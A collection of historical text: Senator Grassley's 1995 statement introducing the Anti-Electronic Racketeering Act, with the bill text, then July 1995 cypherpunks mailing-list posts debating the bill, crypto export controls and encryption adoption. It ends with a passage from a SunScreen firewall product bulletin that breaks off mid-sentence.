Grassley's Statement to the Senate ---------- Mr. President, I rise this evening to introduce the Anti-electronic Racketeering Act of 1995. This bill makes important changes to RICO and criminalizes deliberately using computer technology to engage in criminal activity. I believe this bill is a reasonable, measured and strong response to a growing problem. According to the computer emergency and response team at Carnegie-Mellon University, during 1994, about 40,000 computer users were attacked. Virus hacker, the FBI's national computer crime squad has investigated over 200 cases since 1991. So, computer crime is clearly on the rise. Mr. President, I suppose that some of this is just natural. Whenever man develops a new technology, that technology will be abused by some. And that is why I have introduced this bill. I believe we need to seriously reconsider the Federal Criminal Code with an eye toward modernizing existing statutes and creating new ones. In other words, Mr. President, Elliot Ness needs to meet the Internet. Mr. President, I sit on the Board of the Office of Technology Assessment. That Office has clearly indicated that organized crime has entered cyberspace in a big way. International drug cartels use computers to launder drug money and terrorists like the Oklahoma City bombers use computers to conspire to commit crimes. Computer fraud accounts for the loss of millions of dollars per year. And often times, there is little that can be done about this because the computer used to commit the crimes is located overseas. So, under my bill, overseas computer users who employ their computers to commit fraud in the United States would be fully subject to the Federal criminal laws. Also under my bill, Mr. President, the wire fraud statute which has been successfully used by prosecutors for many users, will be amended to make fraudulent schemes which use computers a crime. It is not enough to simply modernize the Criminal Code. We also have to reconsider many of the difficult procedural burdens that prosecutors must overcome. For instance, in the typical case, prosecutors must identify a location in order to get a wiretapping order. But in cyberspace, it is often impossible to determine the location. And so my bill corrects that so that if prosecutors cannot, with the exercise of effort, give the court a location, then those prosecutors can still get a wiretapping order. And for law enforcers-both State and Federal-who have seized a computer which contains both contraband or evidence and purely private material, I have created a good-faith standard so that law enforcers are not shackled by undue restrictions but will also be punished for bad faith. Mr. President, this brave new world of electronic communications and global computer networks holds much promise. But like almost anything, there is the potential for abuse and harm. That is why I urge my colleagues to support this bill and that is why I urge industry to support this bill. On a final note, I would say that we should not be too scared of technology. After all, we are still just people and right is still right and wrong is still wrong. Some things change and some things do not. All that my bill does is say you can't use computers to steal, to threaten others or conceal criminal conduct. Mr. President, I ask unanimous consent that the text of the bill be printed in the Record. There being no objection, the bill was ordered to be printed in the Record, as follows: S. 974 SECTION 1. SHORT TITLE. This Act may be cited as the ''Anti-Electronic Racketeering Act of 1995''. SEC. 2. PROHIBITED ACTIVITIES. (a) Definitions .-Section 1961(1) of title 18, United States Code, is amended- (1) by striking ''1343 (relating to wire fraud)'' and inserting ''1343 (relating to wire and computer fraud)''; (2) by striking ''that title'' and inserting ''this title''; (3) by striking ''or (E)'' and inserting ''(E)''; and (4) by inserting before the semicolon the following: ''or (F) any act that is indictable under section 1030, 1030A, or 1962(d)(2)''. (b) Use of Computer To Facilitate Racketeering Enterprise .-Section 1962 of title 18, United States Code, is amended- (1) by redesignating subsection (d) as subsection (e); and (2) by inserting after subsection (c) the following new subsection: ''(d) It shall be unlawful for any person- ''(1) to use any computer or computer network in furtherance of a racketeering activity (as defined in section 1961(1)); or ''(2) to damage or threaten to damage electronically or digitally stored data.''. (c) Criminal Penalties .-Section 1963(b) of title 18, United States Code, is amended- (1) by striking ''and'' at the end of paragraph (1); (2) by striking the period at the end of paragraph (2) and inserting ''; and''; and (3) by adding at the end the following new paragraph: ''(3) electronically or digitally stored data.''. (d) Civil Remedies .-Section 1964(c) of title 18, United States Code, is amended by striking ''his property or business''. [*S9181] (e) Use as Evidence of Intercepted Wire or Oral Communications .-Section 2515 of title 18, United States Code, is amended by inserting before the period at the end the following: '', unless the authority in possession of the intercepted communication attempted in good faith to comply with this chapter. If the United States or any State of the United States, or subdivision thereof, possesses a communication intercepted by a nongovernmental actor, without the knowledge of the United States, that State, or that subdivision, the communication may be introduced into evidence''. (f) Authorization for Interception of Wire, Oral, or Electronic Communications .-Section 2516(1) of title 18, United States Code, is amended- (1) by striking ''and'' at the end of paragraph (n); (2) by striking the period at the end of paragraph () and inserting ''; and''; and (3) by adding at the end the following new paragraph: ''(p) any violation of section 1962 of title 18.''. (g) Procedures for Interception .-Section 2518(4)(b) of title 18, United States Code, is amended by inserting before the semicolon the following: ''to the extent feasible''. (h) Computer Crimes .- (1) New prohibited activities .-Chapter 47 of title 18, United States Code, is amended by adding at the end the following new section: '' 1A1030A. Racketeering-related crimes involving computers ''(a) It shall be unlawful- ''(1) to use a computer or computer network to transfer unlicensed computer software, regardless of whether the transfer is performed for economic consideration; ''(2) to distribute computer software that encodes or encrypts electronic or digital communications to computer networks that the person distributing the software knows or reasonably should know, is accessible to foreign nationals and foreign governments, regardless of whether such software has been designated as nonexportable; and ''(3) to use a computer or computer network to transmit a communication intended to conceal or hide the origin of money or other assets, tangible or intangible, that were derived from racketeering activity; and ''(4) to operate a computer or computer network primarily to facilitate racketeering activity or primarily to engage in conduct prohibited by Federal or State law. ''(b) For purposes of this section, each act of distributing software is considered a separate predicate act. Each instance in which nonexportable software is accessed by a foreign government, an agent of a foreign government, a foreign national, or an agent of a foreign national, shall be considered as a separate predicate act. ''(c) It shall be an affirmative defense to prosecution under this section that the software at issue used a universal decoding device or program that was provided to the Department of Justice prior to the distribution.''. (2) Clerical amendment .-The analysis at the beginning of chapter 47, United States Code, is amended by adding at the end the following new item: ''1030A. Racketeering-related crimes involving computers.''. (3) Jurisdiction and venue .-Section 1030 of title 18, United States Code, is amended by adding at the end the following new subsection: ''(g)(1)(A) Any act prohibited by this section that is committed using any computer, computer facility, or computer network that is physically located within the territorial jurisdiction of the United States shall be deemed to have been committed within the territorial jurisdiction of the United States. ''(B) Any action taken in furtherance of an act described in subparagraph (A) shall be deemed to have been committed in the territorial jurisdiction of the United States. ''(2) In any prosecution under this section involving acts deemed to be committed within the territorial jurisdiction of the United States under this subsection, venue shall be proper where the computer, computer facility, or computer network was physically situated at the time at least one of the wrongful acts was committed.''. (i) Wire and Computer Fraud .-Section 1343 of title 18, United States Code, is amended by striking ''or television communication'' and inserting ''television communication, or computer network or facility''. (j) Privacy Protection Act .-Section 101 of the Privacy Protection Act of 1980 (42 U.S.C. 2000aa) is amended- (1) in subsection (a)- (A) by striking ''or'' at the end of paragraph (1); (B) by striking the period at the end of paragraph (2) and inserting ''; or''; and (C) by adding at the end the following new paragraph: ''(3) there is reason to believe that the immediate seizure of such materials is necessary to prevent the destruction or altercation of such documents.''; and (2) in subsection (b)- (A) by striking ''or'' at the end of paragraph (3); (B) by striking the period at the end of paragraph (4) and inserting ''; or''; and (C) by adding at the end the following new paragraph: ''(5) in the case of electronically stored data, the seizure is incidental to an otherwise valid seizure, and the government officer or employee- ''(A) was not aware that work product material was among the data seized; ''(B) upon actual discovery of the existence of work product materials, the government officer or employee took reasonable steps to protect the privacy interests recognized by this section, including- ''(i) using utility software to seek and identify electronically stored data that may be commingled or combined with non-work product material; and ''(ii) upon actual identification of such material, taking reasonable steps to protect the privacy of the material, including seeking a search warrant.''. From shamrock at netcom.com Thu Jul 13 16:50:58 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 13 Jul 95 16:50:58 PDT Subject: mistake on my part Message-ID: <199507132348.TAA03865@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <9507131759.AA12314 at webster.imsi.com>, perry at imsi.com (Perry E. Metzger) wrote: >I made a small mistake -- the new bill does *not* make it a crime to >make crypto software available at Egghead -- but it does more or less >make distribution of crypto software over the internet impossible if >it isn't an escrow based system. And once that happens, you will have to fill out a form and register your copy of crypto software that you got at Egghead, just as you have to register firearms today. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMAWwryoZzwIn1bdtAQG9nAF/WVEXYjXk8fmPHtgn0pxfMTMBLCjAEvM0 +XKCLWWTaQ/5jy3cvFco8FILAb48RuYz =+LO3 -----END PGP SIGNATURE----- From shamrock at netcom.com Thu Jul 13 16:54:39 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 13 Jul 95 16:54:39 PDT Subject: mistake on my part Message-ID: <199507132352.TAA03917@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , hayden at krypton.mankato.msus.edu ("Robert A. Hayden") wrote: >On Thu, 13 Jul 1995 aba at dcs.exeter.ac.uk wrote: > >> If they pull this off stage 2, I wonder how long till stage 3, I think >> it'll be time to leave the sinking ship while exit visas are still >> granted! > >And go where? I know i'm living in a shell, but I've never heard a >difinitive answer of where is a better place to live and still has the >same or better freedoms. > >*serious question* There is none. At least not for the average citizen with an avarage income. This is the best you will find. Everywhere else it is already worse than here and getting worse as well. Perhaps nanotech will have a breakthrough and allow colonization of outer space. There sure is nothing on this planet. Sorry. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMAWxbioZzwIn1bdtAQE1GwF+PshiXqSvW6H3hpGks8Z+6PqdR2wEeWbC 1TUfjgzcGKVl3vFc1SZWTr2VitCPJb0q =1xuY -----END PGP SIGNATURE----- From pgf at tyrell.net Thu Jul 13 17:01:03 1995 From: pgf at tyrell.net (Phil Fraering) Date: Thu, 13 Jul 95 17:01:03 PDT Subject: Crisis Overload (re Electronic Racketeering) In-Reply-To: <199507132215.BAA17628@shadows.cs.hut.fi> Message-ID: <199507132356.AA13388@tyrell.net> Date: Fri, 14 Jul 1995 01:15:04 +0300 From: Tatu Ylonen to break encryption for anyone. Plus, it was created and is primarily distributed *outside* the United States, in a country where none of the algorithms are patented. It can thus be openly available for Well, I think it's nice that people outside the U.S. will have access to encryption; it appears, however, that those of us in the U.S. writing such software may end up having to forego payment and credit, until Blacknet is very strong... Phil From shamrock at netcom.com Thu Jul 13 17:07:57 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 13 Jul 95 17:07:57 PDT Subject: The end of public key cryptography as we know it? Message-ID: <199507140005.UAA04037@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199507132009.AA15283 at tyrell.net>, pgf at tyrell.net (Phil Fraering ) wrote: > From: Doug Hughes > Date: Thu, 13 Jul 1995 13:46:10 -0500 > > An article posted on sci.crypt stated that quantum factoring > is real and that an article was posted in this month's Science > magazine. The author of the post says this would make factoring > a 10 bit number the same time as factoring a 100000000 bit number. > >You can bet your ass and your mother's and grandmother's donatable >organs that if this were possible, then the legislative initiatives >currently underway would not be: they'd just let us use RSA and get >a false sense of security. Even with a quantum computer, factoring is still an extra step that is not required with GAK. Besides, factoring will always be more expensive than GAK, at least for the other side. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMAW0VSoZzwIn1bdtAQG9QQF+OWci7VK8X9/ropNlf5dGW5/jbHWo+4cR 2GvuYpDvoAbDRQmDcpFR7u8hBog7KIet =c/wa -----END PGP SIGNATURE----- From unicorn at polaris.mindport.net Thu Jul 13 17:15:55 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Thu, 13 Jul 95 17:15:55 PDT Subject: OTP server.. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >How about WWW one time pad servers? You browse to your >favorite OTP server, which has a random number generator >running in the background. You tell it to give you a block >of X bytes, and mail it to persons 1, 2, 3, ... N. > >These people then use this OTP for encrypting a document. >It wouldn't be illegal because you aren't encoding any data >and distributing it.. You're generating raw data. You wouldn't >have to distribute any crypto software, you just xor your >data file with the number of bytes that you were sent >in the mail from the OTP server.. Enough of these things >would be REALLY tough to monitor.. Plus, you could connect >8 different times and just pick one of the sets.. Or you >could just use a portion of the set that you and the receiving >party agreed upon. > >Or, instead of using email, you could have a application/x-otp >browser that would collect the OTP that the server sent out >to you over HTTP. (this would be really hard to differentiate >from other data if the server was doing other things at the >same time). > >Thoughts? > I think you're trusting the server a GREAT deal. > Doug Hughes Engineering Network Services > doug at eng.auburn.edu Auburn University -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMAcXby1onm9OaF05AQEUpggApWiVdcA4UAsVIXKEor3JnM6PkEZleO6b CpbyXYVZNRmUuePTuUMf9KQkI0accFm/sjnc7t12Hujs60utILWYM2F71GSrHZ0/ POx/oExL5TgcR9m6e0cYM58k9xZT2golXXHukTXnU6FlCNSNMfWnBziTgsSwCj1q mZO8xQnbSWteWL50g7cFBMvGbyDSygOZu9MPqzRRvUVoF/kL78G0SAwT8HzGadfk yIV40wDicBfuPH1GcaPlbGW+0Adips0WHAETBSRmUXSBdu+uQcs6LhEhddvbKmzF Rh4qpIR0FYKcnyax0kqk6eBBWqo7oVCdm9nYMHc2yg6I9dQLGWnQIA== =b9lf -----END PGP SIGNATURE----- From unicorn at polaris.mindport.net Thu Jul 13 17:30:22 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Thu, 13 Jul 95 17:30:22 PDT Subject: The end of public key cryptography as we know it? Message-ID: >-----BEGIN PGP SIGNED MESSAGE----- > >In article <199507132009.AA15283 at tyrell.net>, pgf at tyrell.net (Phil >Fraering ) wrote: > >> From: Doug Hughes >> Date: Thu, 13 Jul 1995 13:46:10 -0500 >> >> An article posted on sci.crypt stated that quantum factoring >> is real and that an article was posted in this month's Science >> magazine. The author of the post says this would make factoring >> a 10 bit number the same time as factoring a 100000000 bit number. >> >>You can bet your ass and your mother's and grandmother's donatable >>organs that if this were possible, then the legislative initiatives >>currently underway would not be: they'd just let us use RSA and get >>a false sense of security. You give them too much credit. Still, there's always IDEA and suchlike. The legislation would stand in any event. >Even with a quantum computer, factoring is still an extra step that is not >required with GAK. Besides, factoring will always be more expensive than >GAK, at least for the other side. > >- -- >- -- Lucky Green > PGP encrypted mail preferred. >- --- >[This message has been signed by an auto-signing service. A valid signature >means only that it has been received at the address corresponding to the >signature and forwarded.] > >-----BEGIN PGP SIGNATURE----- >Version: 2.6.2 >Comment: Gratis auto-signing service > >iQBFAwUBMAW0VSoZzwIn1bdtAQG9QQF+OWci7VK8X9/ropNlf5dGW5/jbHWo+4cR >2GvuYpDvoAbDRQmDcpFR7u8hBog7KIet >=c/wa >-----END PGP SIGNATURE----- From warlord at MIT.EDU Thu Jul 13 17:35:40 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Thu, 13 Jul 95 17:35:40 PDT Subject: Crypto '95 roommate? Message-ID: <199507140035.UAA23513@toxicwaste.media.mit.edu> Anyone looking for a roommate for crypto '95? If so, let me know. -derek From waynec at csr.UVic.CA Thu Jul 13 17:38:13 1995 From: waynec at csr.UVic.CA (Wayne Chapeskie) Date: Thu, 13 Jul 95 17:38:13 PDT Subject: Crisis Overload (re Electronic Racketeering) Message-ID: <199507140038.RAA20869@clipper.csc.UVic.CA> -----BEGIN PGP SIGNED MESSAGE----- On Jul 13, 11:10am, Timothy C. May wrote: > >Every couple of months there's been a new legislative attack on what were >once basic American freedoms. (Sorry to focus on America. I'm sure you >folks in the liberty-loving paradises of, say, Germany, are gloating over >our hand-wringing.) > >We're losing the war. We can send in donations to the NRA and EFF, offer >our support to the ACLU and EPIC, but the tide just keeps rolling in, >washing away our efforts. The full-time lawmakers in D.C. can proliferate >new repressive laws much faster than we can fight them. The current legislative situation regarding computer encryption and communication technologies is one that firearms owners in the US and other places have for many years been familiar with. Every congressional session, a US Representative introduces a bill to repeal the Second Amendment. Almost every session, a bill to prohibit handguns is introduced. Every session, nearly a dozen or more bills are introduced which infringe in some way on the rights of Americans to own and use firearms, through registration, taxation of ammunition and firearms, licensing of owners, restrictions on imports, restrictions on dealers, bans of certain types of ammunition, and on and on and on. As the NRA might say: Welcome to the party. Get used to the heat, because it isn't going to get any better. As computer people, we have for some decades now been able to carry on with our activities essentially unnoticed by the people Perry Metzger has quite precisely referred to as fascists. No longer. Fortunately, most bills introduced into the US congress die without becoming law. This is the nature of the US legislative process. This has included most (but not all) anti-gun rights bills, and will likely include most anti-crypto and anti-free-speech bills as well. (As was pointed out, this particular bill has no co-sponsors, and is unlikely to proceed out of committee). Unfortunately, proponents of secure and private communications, as well as proponents of free speech over computer communications networks, are likely to find themselves under constant legislative and executive attack for the forseeable future, just as American gun owners have been. Wayne Chapeskie -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAgUBMAW8PgB/BYFE8GeZAQHDOwP+Ohzckk5GVkpw29WMzZcaTuCLeYJUrLfi 6HVkFvQsLOOCLKXAnqWyVxxLjUAlEPLs4waVTEgj2zntX3K/zeyejTSFgbM4ITPK V4UOpTif6WMoZBqossxzNQT+JJDpNC6+b2QmuXIzeC60UO4LbU5OmSRXcQ0uCdbt z1FSZTt/ol0= =VAPu -----END PGP SIGNATURE----- From erc at khijol.intele.net Thu Jul 13 17:45:41 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Thu, 13 Jul 95 17:45:41 PDT Subject: OTP server.. In-Reply-To: Message-ID: On Fri, 14 Jul 1995, Black Unicorn wrote: > >How about WWW one time pad servers? You browse to your > >favorite OTP server, which has a random number generator > >running in the background. You tell it to give you a block > >of X bytes, and mail it to persons 1, 2, 3, ... N. > > I think you're trusting the server a GREAT deal. Why is that? The randomness of the data can be easily checked... -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From rsnyder at janet.advsys.com Thu Jul 13 17:55:30 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Thu, 13 Jul 95 17:55:30 PDT Subject: OTP server.. In-Reply-To: Message-ID: <199507140053.UAA13342@janet.advsys.com> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From jya at pipeline.com Thu Jul 13 18:00:55 1995 From: jya at pipeline.com (John Young) Date: Thu, 13 Jul 95 18:00:55 PDT Subject: co-sponsors S.974 Message-ID: <199507140100.VAA00681@pipe4.nyc.pipeline.com> Responding to msg by perry at imsi.com (Perry E. Metzger) on Thu, 13 Jul 4:51 PM >I searched Thomas and couldn't find any evidence of >co-sponsors to the Senate bill. Am I wrong here? As you know, gnu at toad.com sent the EFF analysis which included: > From: ssteele at eff.org (Shari Steele) > ... > Fortunately, the bill does not have a very promising > future. The bill has no co-sponsors. It was immediately > referred to the Committee on the Judiciary, where it > currently sits. LEXIS's bill tracking report only gives > it a 10% chance of passing out of the committee. ... In contrast, the following is from law list Cyberia-L today: > At 8:17 AM 7/13/95 -0400, James R. Coleman wrote: >> Anyone know the committee status of this bill. Does it >> have co-sponsors? House sponsors? Are hearings >> scheduled? Or is Grassly not serious but tryint to get >> some press in Des Moines? > The bill was co-sponsored by Sens. Kyl (R-AZ) and Leahy > (D-VT). It has the enthousiastic support of the > administration. In a DOJ press release following its > introduction, AG Reno is quoted as saying "computer crime > is fast becoming everyone's problem. I'm encouraged that > this bill is off to a bipartisan start, and I hope > Congress will move quickly to enact it." > > If there's a companion bill in the House, I'm not aware of > it. > > John Noble Anyone got better info on yes/no sponsors or seen the DOJ press release? From hayden at krypton.mankato.msus.edu Thu Jul 13 18:10:17 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Thu, 13 Jul 95 18:10:17 PDT Subject: Expansion on my earlier rant (long) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hi all, me again. I've received about a dozen requests to clarify my rant earlier about what I think needs to be done about the future of the CPs and the net, now that the official declaration of war has been made by the government. So, I'm going to do that. As a quick warning, however, I need to remind everyone that I am not a programmer. My knowledge of Internet protocols is passable, but actual implementation issues are beyond me. Basically, I'm a well-informed user with dreams. Professionally, I'm a teacher and a graduate student in the area of Education Technology (use of modern technologies as applied to education) at Mankato State University in Minnesota. I also write geek codes and am active politically serving on the college senate and being outspoken in other areas. :-) Anyways . . . - ------------- When I look at the current political climate, the current technologies, and the predications for the next two or three years of the expected changes in the social makeup to the Internet, I quickly realize that the Cypherpunks cannot possibly, except by pure luck, expect to influence any change of the net. The problem isn't that it is growing too fast. The problem is that we as a generation of network users, who first came online circa 85-92, are not the same generation that make up the bulk of the population. The bulk of the population, and the one that is continuing to come online, don't CARE about technical issues. All they care about is what the net can do for them as a COMMUNICATION TOOL. And until WE stop getting bogged in technical issues and start looking at this from the user's end of the spectrum, not enough people are going to care for it to matter. So when you take a program like PGP, which by all definitions is a technological godsend, and introduce it to the mass populations of the net, you get a big "Buh!?" back from them. Why? Because they just don't care. Furthermore, it becomes difficult to to teach them about the values of the program because PGP is far too difficult to use. I'm not saying that the majority of the net is stupid, just that they don't want things to be any more complicated than necessary. Thus, if we want to institute change, we have to come at it from a different angle. We have to take into consideration the sociological makeup of the net, and, more importantly, what the current and future populations of the net are going to WANT. Serving the needs of a tiny percentage of people isn't going to accomplish what we want. - ------- WHAT SHOULD WE DO Now, if I was the king, this is what I'd like to see done... 1) RE-EVALUATE PUSHING PGP There is little doubt that PGP is a great program. It does everything we want it to do. Unfortunately, there are some significant problems with it as well. A) ITAR: 'nuff said. This prevents it's global use. B) Patent concerns. I don't know fully the details of this, but if I understand, there are some concerns about who owns what portions of the encryption algorithms, or something to that effect. C) Can PGP's features be implemented in style usable by the current generation of Internet users? The problem is that while we fight solving all of these concerns, we are going nowhere. Would it be, in terms of time required, better to come up with another system that solves these problems? By using international encryption techniques and Public Domain algorithms, and design the program specifically for implementation in user-end and server-end programs? I don't know. But this is what the re-evaluation needs to answer. 2) PUSH FOR UNIVERSAL DIGITAL SIGNATURES In my version of utopia, all digital messages are signed. Unfortunately, right now, there are no mechanisms in place to achieve that. First, a way to get signatures out needs to be done. A server<->client program similar to Archie needs to be developed that will allow people to retrieve signatures off of some registry site(s). Of course, this should be done with encryption, probably something similar to what netscape uses for its data transfers. I should be able to get any person's digital signature knowing nothing more than their email address, or less specific, their name. This is a white pages of the net. Second. A mechanism needs to be devised where all email and usenet material is digitally signed. This needs to be done in a way that the user is not even aware that it is being done. Perhaps an encrypted environment variable containing the key would work (ie, you run a program, type in your passphrase, it encrypts it to a file, assigns your signature, and then reads that file into the environment, decrypting it when needed. It does this once during generation.). In any case, no user should have to manually sign anything. Optimally, signatures would be part of the header of the message, and not even seen by users. It's not 100% safe, especially on a multi-user system, but it's a helluva start. Third, automated checking, via news readers or mail readers needs to be implemented. All it needs to do is when a message arrives, it first greps the users personal keyring. If the matching signature isn't found, it checks the system keyring. If not found, it uses a similar protocol as above to check the Global Keyring (using an encrypted session). If the signature is found to be authentic, it marks it as such, if not, it warns the user and it is unreliable data. This optimly would take place prior to delivery by the mail transfer agent or news transfer agent of the receiving computer. No matter what, digital signatures need to be pushed as being unrelated to cryptography. While they are similar, their are political problems with encryption, but not really with signatures. If we make a hearty push towards authenticated communications, encryption falls right in line as a (oh, by the way, we can also...) 3) NEAR TRANSPARENT ENCRYPTION In the end, the goal is that encryption becomes simple enough and unintrusive enough that everybody will use it. Once again, however, we need public key servers that can dole out keys on request. Furthermore, encryption needs to be as simple as clicking on a button when you mail it, with the mail program or transfer agent doing the appropriate scrambling based on the addressee. It needs to be able to get keys from servers in the background and decrypt without any more manual interaction than typing in a passphrase. It is also my belief that digital signatures and encryption SHOULD NOT utilize the same key in a fully automated system, or have different passphrases within the same key. 4) AND IT'S ALL GOTTA SIMPLE Finally, I need to reiterate this. Whatever is implemented has to be ungodly simple to use. Users shouldn't have to think about this stuff. Administrators shouldn't have to deal with user requests about this stuff (just install the programs and go to it). It's all gotta be free, AND internationally legal. If we fail any of these tests, we can't win. 5) JOIN THE EFF Well, I just thought I'd throw this in, it can't hurt :-) - ---------------------- Anyway, that's what I see as needing to be done. All of this ISN'T just about writing code, however. All of us, myself included, need to start electronically signing everything we send, especially to mailing lists and as much as you can to usenet. If anything, it's gets the word out as a USEFUL implementation of this technology (verification of message). We need to not be afraid to send a letter to our elected officals warning them about what the laws they are passing are going to do. That's the easy part. The hard part is staying at it long enough to win the war. [as a side note, does anybody have a script or program that will auto-sign a message? I'm usuing mkpgp for pine right now as an alternate editor, but that does more than I need (encryption and such.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAXEAjokqlyVGmCFAQH5aAP+Lbw37+//V6Blm29DCLbzkHgZ2u2pOU1c mzqpBBwfA2cggdYPZj6a/wJAmWr06aMiCV02MFJF90NW3BdwVDogCrc67+iHY5UM fc3AVXzFvM39KG6Ruizo3Wf6tXSpWUxvrgCiWODR4SiwyvpEvFbSJ+IsawUSLpfe BZKAFv8bi50= =zmoa -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From merriman at arn.net Thu Jul 13 18:44:26 1995 From: merriman at arn.net (David K. Merriman) Date: Thu, 13 Jul 95 18:44:26 PDT Subject: Root Causes Message-ID: <199507140151.UAA01504@arnet.arn.net> -----BEGIN PGP SIGNED MESSAGE----- While I respect the ideas and opinions submitted by the majority of the members of this list, I wonder if perhaps we're failing to deal with the _root_ problem of such things as the CDA, Clipper, DTA, etc. Specifically, I wonder if it wouldn't be a better approach to *prevent* such measures from ever being proposed in the first place. (pause to adjust nomex undies and titanium body armor :-) Is there any precedence or possibility of either filing civil or criminal charges against a Government official for their _official_ actions? Something that will not only make for some Serious Press, but hit them from an unexpected angle? (close hatch on bunker :-) It would seem that things such as the CDA, etc, are patent violations of the Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such measures be violating our civil rights, and thus be criminally liable? Aren't Congressrodents supposed to take an Oath of Office that involves upholding the Constitution? Alternatively, could a civil suit be filed for invasion of privacy or somesuch? Or perhaps the previously mentioned violation of civil rights (a la Rodney King)? How many laws, etc, can we invoke? I mean, most congresscritters don't craft laws on their own, so the involvement of their staff would constitute conspiracy, as well, wouldn't it? I'd think that if a few of the were sued and/or tried, it would sure make the rest of them consider the full implications of any laws they might consider proposing. Too, it might accidentally ripple through all of the Government, and settle down some of the beaurocrats that aren't subject to voters. IANAL, of course, so I'll leave it up to those on the list who are to express more informed opinions; still, it _seems_ like a possible course of action..... Dave Merriman -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAWqT8VrTvyYOzAZAQFPiwQAluzkD3H+AcUFr7qNhf84I7Y3FNB27Lxc jQQ5UQnYgvQpHhlExJGmxDjebbOgbOik5Xu2KoQYbdutc/LBWHN6OzfLWim9jWwq C1nKEnDUo1jKQ+LcsV0/TGrwKPUYVnOhswZPydn50xnKF3KuW17RnXFeYJi+DTdZ D3YtxRa2shc= =JiVo -----END PGP SIGNATURE----- This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! ------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From gnu at toad.com Thu Jul 13 18:47:40 1995 From: gnu at toad.com (John Gilmore) Date: Thu, 13 Jul 95 18:47:40 PDT Subject: SunFlash 79.05: SunScreen and Java Questions & Answers Message-ID: <9507140147.AA13138@toad.com> [Note the export related stuff, and the 40-bit RC2 & RC4. But also note "An International version will be available early in 1996". --gnu] ============================================================================== SunFlash 79.05 SunScreen and Java Questions & Answers July 1995 John J. McLaughlin, Editor/Publisher flash at flashback.com ============================================================================== SunScreen is a Product Line comprised of enabling products/solutions for doing business transactions on the Internet and other public networks. The first product offering in the SunScreen Product Line is the SPF-100, a completely new network security device. SPF-100 is a dedicated, turnkey solution designed to be network undetectable. Shipped pre-configured, SPF- 100 is based on state-of-the-art packet screening integrated with encryption to provide private and authenticated communications on public networks. Several questions about the Java language and the HotJava browser are also addressed. ------------------------------------------------------------------------------- The SunScreen sits on network boundaries, either between two LAN's or between a LAN and a WAN. It can be used to achieve compartmentalization within internal networks or to use the Internet or other public networks as a virtual, secure, private network (VSPN). The SPF-100 is being targeted towards enterprise customers who require the highest levels of network security and guaranteed privacy. The market segments who have expressed the most interest in the SunScreen SPF-100 include Telecommunications, Finance, Health Care and the Government. Due to restrictions imposed on the export of encryption products, the SunScreen SPF-100 will initially be released only in the U.S.A.. and Canada. An International version of the product is scheduled for early 1996. What does SunScreen look like? The SunScreen consists of two physical components: SPF-100, the security gateway product is based on a headless SPARC-based system running an embedded OS and shipped standard with five ethernet ports (one on-board and four through a Quad Ethernet Card). Four of the ports are used for screening packets and have no IP address. Since the embedded OS does not include any user programs, network services, etc., it cannot be logged into, nor can any applications be run on it. The SPF-100 is managed by the SunScreen Administration Station, an Intel 486-based system running MS-DOS and Windows 3.1. Multiple SPF-100's may be remotely managed by a single SunScreen Administration Station, or a single SPF-100 can be managed by multiple SunScreen Administration Stations. The SPF-100 uses the fifth ethernet port to establish an encrypted connection to the SunScreen Administration Station. The SunScreen Administration Station is the only device that can be used for monitoring, configuring and managing the SPF-100. A SunScreen is set up to be the point of contact between two administrative domains such as a private and a public network. Two or more of the Quad Ethernet ports can be used to bridge the private and public sides. The on- board Lance Ethernet interface links the SPF-100 to the SunScreen Administration Station through an authenticated and encrypted connection. Functionally, the SPF-100 includes an IP level packet screen and a facility to encrypt and decrypt data 